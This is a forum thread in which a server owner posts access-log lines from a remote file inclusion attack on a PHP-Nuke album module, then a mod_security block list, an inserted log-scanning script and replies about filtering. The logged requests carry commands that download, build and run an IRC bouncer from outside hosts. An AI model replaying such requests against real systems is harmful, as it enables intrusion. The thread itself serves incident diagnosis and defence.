The Community Forums


server hacked

Discussion in 'General Discussion' started by parser, Oct 12, 2005.

  1. parser

    parser Member

    Joined:
    Aug 22, 2003
    Messages:
    19
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Israel
    Hello,

    Today my server was hacked:
    201.5.212.224 - - [11/Oct/2005:00:48:58 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp;curl%20-o%20psybnc.tar.gz%20lgbos.100free.com/psybnc.tar.gz;tar%20-zxvf%20psybnc.tar.gz HTTP/1.1" 200 14964 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    201.5.212.224 - - [11/Oct/2005:00:49:52 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp;rm%20-rf%20psybnc.tar.gz HTTP/1.1" 200 5997 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    201.5.212.224 - - [11/Oct/2005:00:50:54 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp;curl%20-o%20psybnc.tar.gz%20http://www.psychoid.lam3rz.de/psyBNC2.3.2-4.tar.gz HTTP/1.1" 200 6472 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    201.5.212.224 - - [11/Oct/2005:00:51:27 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp;tar%20-xvzf%20psybnc.tar.gz HTTP/1.1" 200 15481 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    201.5.212.224 - - [11/Oct/2005:00:51:42 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp;cd%20psybnc;make;pico%20psybnc.conf;./psybnc HTTP/1.1" 200 6129 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    201.5.212.224 - - [11/Oct/2005:00:52:50 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp;rm%20-rf%20psybnc HTTP/1.1" 200 5997 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    201.5.212.224 - - [11/Oct/2005:00:53:40 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp;curl%20-o%20psybnc.tar.gz%20http://www.geocities.com/sorin_smen/psybnc.tgz HTTP/1.1" 200 6867 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    201.5.212.224 - - [11/Oct/2005:00:53:47 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp;tar%20-zxvf%20psybnc.tgz;cd%20psybnc;./psybnc HTTP/1.1" 200 6045 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    201.5.212.224 - - [11/Oct/2005:00:54:02 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp/psybnc;./psybnc HTTP/1.1" 200 6045 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    201.5.212.224 - - [11/Oct/2005:00:54:07 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp/psybnc;ls HTTP/1.1" 200 6147 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"


    I have modsec.user.conf, but it does not help. Why?

    # Require HTTP_USER_AGENT and HTTP_HOST in all requests
    # SecFilterSelective "HTTP_USER_AGENT|HTTP_HOST" "^$"

    # Require Content-Length to be provided with
    # every POST request
    SecFilterSelective REQUEST_METHOD "^POST$" chain
    SecFilterSelective HTTP_Content-Length "^$"

    # Don't accept transfer encodings we know we don't handle
    # (and you don't need it anyway)
    SecFilterSelective HTTP_Transfer-Encoding "!^$"

    # Protecting from XSS attacks through the PHP session cookie
    SecFilterSelective ARG_PHPSESSID "!^[0-9a-z]*$"
    SecFilterSelective COOKIE_PHPSESSID "!^[0-9a-z]*$"

    SecFilter "viewtopic\.php\?" chain
    SecFilter "chr\(([0-9]{1,3})\)" "deny,log"

    # Block various methods of downloading files to a server
    SecFilterSelective THE_REQUEST "wget "
    SecFilterSelective THE_REQUEST "lynx "
    SecFilterSelective THE_REQUEST "scp "
    SecFilterSelective THE_REQUEST "ftp "
    SecFilterSelective THE_REQUEST "cvs "
    SecFilterSelective THE_REQUEST "rcp "
    SecFilterSelective THE_REQUEST "telnet "
    SecFilterSelective THE_REQUEST "ssh "
    SecFilterSelective THE_REQUEST "echo "
    SecFilterSelective THE_REQUEST "links -dump "
    SecFilterSelective THE_REQUEST "links -dump-charset "
    SecFilterSelective THE_REQUEST "links -dump-width "
    SecFilterSelective THE_REQUEST "links http:// "
    SecFilterSelective THE_REQUEST "links ftp:// "
    SecFilterSelective THE_REQUEST "links -source "
    SecFilterSelective THE_REQUEST "mkdir "
    SecFilterSelective THE_REQUEST "cd /tmp "
    SecFilterSelective THE_REQUEST "cd /var/tmp "
    SecFilterSelective THE_REQUEST "cd /etc/httpd/proxy "


    # WEB-ATTACKS ps command attempt
    SecFilterSelective THE_REQUEST "/bin/ps"

    # WEB-ATTACKS /bin/ps command attempt
    SecFilterSelective THE_REQUEST "ps\x20"

    # WEB-ATTACKS wget command attempt
    SecFilter "wget\x20"

    # WEB-ATTACKS uname -a command attempt
    SecFilter "uname\x20-a"

    # WEB-ATTACKS /usr/bin/id command attempt
    SecFilter "/usr/bin/id"

    # WEB-ATTACKS id command attempt
    SecFilter "\;id"

    # WEB-ATTACKS echo command attempt
    SecFilter "/bin/echo"

    # WEB-ATTACKS kill command attempt
    SecFilter "/bin/kill"

    # WEB-ATTACKS chmod command attempt
    SecFilter "/bin/chmod"

    # WEB-ATTACKS chgrp command attempt
    SecFilter "/chgrp"

    # WEB-ATTACKS chown command attempt
    SecFilter "/chown"

    # WEB-ATTACKS chsh command attempt
    SecFilter "/usr/bin/chsh"

    # WEB-ATTACKS tftp command attempt
    SecFilter "tftp\x20"

    # WEB-ATTACKS /usr/bin/gcc command attempt
    SecFilter "/usr/bin/gcc"

    # WEB-ATTACKS gcc command attempt
    SecFilter "gcc\x20-o"

    # WEB-ATTACKS /usr/bin/cc command attempt
    SecFilter "/usr/bin/cc"

    # WEB-ATTACKS cc command attempt
    SecFilter "cc\x20"

    # WEB-ATTACKS /usr/bin/cpp command attempt
    SecFilter "/usr/bin/cpp"

    # WEB-ATTACKS cpp command attempt
    SecFilter "cpp\x20"

    # WEB-ATTACKS /usr/bin/g++ command attempt
    SecFilter "/usr/bin/g\+\+"

    # WEB-ATTACKS g++ command attempt
    SecFilter "g\+\+\x20"

    # WEB-ATTACKS bin/python access attempt
    SecFilter "bin/python"

    # WEB-ATTACKS python access attempt
    SecFilter "python\x20"

    # WEB-ATTACKS bin/tclsh execution attempt
    SecFilter "bin/tclsh"

    # WEB-ATTACKS tclsh execution attempt
    SecFilter "tclsh8\x20"

    # WEB-ATTACKS bin/nasm command attempt
    SecFilter "bin/nasm"

    # WEB-ATTACKS nasm command attempt
    SecFilter "nasm\x20"

    # WEB-ATTACKS /usr/bin/perl execution attempt
    SecFilter "/usr/bin/perl"

    # WEB-ATTACKS perl execution attempt
    SecFilter "perl\x20"

    # WEB-ATTACKS nt admin addition attempt
    SecFilter "net localgroup administrators /add"

    # WEB-ATTACKS traceroute command attempt
    SecFilter "traceroute\x20"

    # WEB-ATTACKS ping command attempt
    SecFilter "/bin/ping"

    # WEB-ATTACKS netcat command attempt
    SecFilter "nc\x20"

    # WEB-ATTACKS nmap command attempt
    SecFilter "nmap\x20"

    # WEB-ATTACKS xterm command attempt
    SecFilter "/usr/X11R6/bin/xterm"

    # WEB-ATTACKS X application to remote host attempt
    SecFilter "\x20-display\x20"

    # WEB-ATTACKS lsof command attempt
    SecFilter "lsof\x20"

    # WEB-ATTACKS rm command attempt
    SecFilter "rm\x20"

    # WEB-ATTACKS mail command attempt
    SecFilter "/bin/mail"

    # WEB-ATTACKS mail command attempt
    SecFilter "mail\x20"

    # WEB-ATTACKS /bin/ls command attempt
    SecFilterSelective THE_REQUEST "/bin/ls"

    # WEB-ATTACKS /etc/inetd.conf access
    SecFilter "/etc/inetd\.conf" log,pass

    # WEB-ATTACKS /etc/motd access
    SecFilter "/etc/motd" log,pass

    # WEB-ATTACKS /etc/shadow access
    SecFilter "/etc/shadow" log,pass

    # WEB-ATTACKS conf/httpd.conf attempt
    SecFilter "conf/httpd\.conf" log,pass

    # WEB-ATTACKS .htgroup access
    SecFilterSelective THE_REQUEST "\.htgroup" log,pass

    #PHP-NUKE spam filter
    SecFilter "name=WebMail"

    #PHP-NUKE web attack
    SecFilter "cd%20/var/tmp;"

    #PHP-NUKE web attack
    SecFilter "cd%20/var/tmp"

    #PHP-NUKE web attack
    SecFilter "cd%20/tmp"

    #PHP-NUKE web attack
    SecFilter "chmod%204777"

    # phpbb2 shell exploit
    SecFilter "rush="
    SecFilter "highlight=%2527"
    SecFilter "highlight=%2725"
    SecFilter "highlight=%27"
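    Detection logic run over access-log lines like the ones quoted above, as an added example that is not part of the post: it percent-decodes each query parameter, flags a remote URL in a parameter (remote file inclusion) and a chained shell command, and shows why a SecFilter on the literal string cd%20/var/tmp never fires, because ModSecurity 1.x URL-decodes the request before matching. The sample log lines, hosts and addresses are constructed.

```python
import re
from urllib.parse import urlparse, unquote, unquote_plus
# Apache combined log format; only the fields this check needs are captured.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

# Remote URL in a parameter (remote file inclusion) or a decoded shell command chain.
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.I)
SHELL_RE = re.compile(r'(?:^|[;|&\s])(?:curl|wget|tar|chmod|perl|python|nc)\s'
                      r'|cd\s+/(?:var/)?tmp\b')

# Constructed sample lines (RFC 5737 addresses, placeholder hosts) modelled on the
# post's entries; the second line is ordinary gallery traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [11/Oct/2005:00:48:58 +0200] "GET /modules/4nAlbum/public/'
    'displayCategory.php?basepath=http://example.invalid/newcmd.gif?&cmd=cd%20'
    '/var/tmp;curl%20-o%20psybnc.tar.gz%20example.invalid/psybnc.tar.gz HTTP/1.1"'
    ' 200 14964 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [11/Oct/2005:01:02:11 +0200] "GET /modules/4nAlbum/public/'
    'displayCategory.php?basepath=photos/2005 HTTP/1.1" 200 2211 "-" "Mozilla/5.0"',
]

def query_params(target):
    """Split on '&' only and percent-decode, so a ';' inside a value survives."""
    for pair in urlparse(target).query.split('&'):
        name, _, raw = pair.partition('=')
        if name:
            yield name, unquote_plus(raw)

def analyse_line(line):
    """Return a list of (parameter, reason) findings for one access-log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    findings = []
    for name, value in query_params(m.group('target')):
        if REMOTE_URL_RE.search(value):
            findings.append((name, 'remote URL in parameter (possible RFI)'))
        if SHELL_RE.search(value):
            findings.append((name, 'shell command chain in parameter'))
    return findings

def scan(lines):
    """(client IP, findings) for every line with at least one finding."""
    return [(LOG_RE.match(l).group('ip'), analyse_line(l)) for l in lines if analyse_line(l)]

def literal_filter_hits(line, pattern):
    """Emulate a plain-string SecFilter: ModSecurity 1.x URL-decodes the request
    before matching, so a pattern containing a literal '%20' can never fire."""
    m = LOG_RE.match(line)
    return bool(m) and pattern in unquote(m.group('target'))
```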
     
  2. linux-image

    linux-image Well-Known Member

    Joined:
    Jun 8, 2004
    Messages:
    1,192
    Likes Received:
    1
    Trophy Points:
    38
    Location:
    India
    cPanel Access Level:
    Root Administrator
    Check if LoadModule is active in httpd.conf.
     
  3. sh4ka

    sh4ka Well-Known Member

    Joined:
    May 12, 2005
    Messages:
    442
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    US
    cPanel Access Level:
    DataCenter Provider
    You had better check that the AddModule line for mod_security is not commented out, or that it exists in the AddModule section at all. Also try to activate all the processes listed under "Background Process Killer" at "System Health" in the left WHM menu.

    Is your mod_security installed from the add-on in WHM?
     
  4. neta5

    neta5 Active Member

    Joined:
    Oct 7, 2005
    Messages:
    34
    Likes Received:
    0
    Trophy Points:
    6
    You mean it's better that we turn on these items?
    BitchX
    bnc
    eggdrop
    generic-sniffers
    guardservices
    ircd
    psyBNC
    ptlink
    services
     
  5. parser

    parser Member

    Joined:
    Aug 22, 2003
    Messages:
    19
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Israel
    Active; it's a problem with the filtering of mod_security.

    In audit_log (the mod_security log), everything, for example "wget", is denied with code 406.
     
  6. parser

    parser Member

    Joined:
    Aug 22, 2003
    Messages:
    19
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Israel

    Yes, installed from WHM.
    I activated all the processes listed under "Background Process Killer". Thanks!
     
  7. domtaj

    domtaj Active Member

    Joined:
    Aug 29, 2005
    Messages:
    42
    Likes Received:
    0
    Trophy Points:
    6
    The file got dropped by way of curl, so better put

    SecFilterSelective THE_REQUEST "curl "

    into mod_security's conf file, as that will also stop other non-detected drops.
     